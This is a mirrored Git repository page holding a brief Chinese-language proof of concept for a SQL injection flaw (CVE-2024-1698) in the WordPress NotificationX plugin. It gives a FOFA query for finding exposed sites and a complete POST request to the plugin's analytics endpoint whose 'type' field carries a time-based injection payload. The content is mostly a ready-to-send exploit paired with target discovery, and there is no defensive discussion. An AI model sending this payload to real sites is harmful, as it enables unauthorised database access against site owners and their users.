wy876_POC/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md at 9ce372c889ebd4aeaa73907d23090b9d3065d7ec - wy876_POC - 临风笛

admin/wy876_POC

mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00

wy876 97ee8448c6

Update and rename WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md to WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md

2024-05-01 11:54:05 +08:00

285 B

Raw Blame History

WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698)

fofa

body="/wp-content/plugins/notificationx"

poc

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: 
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}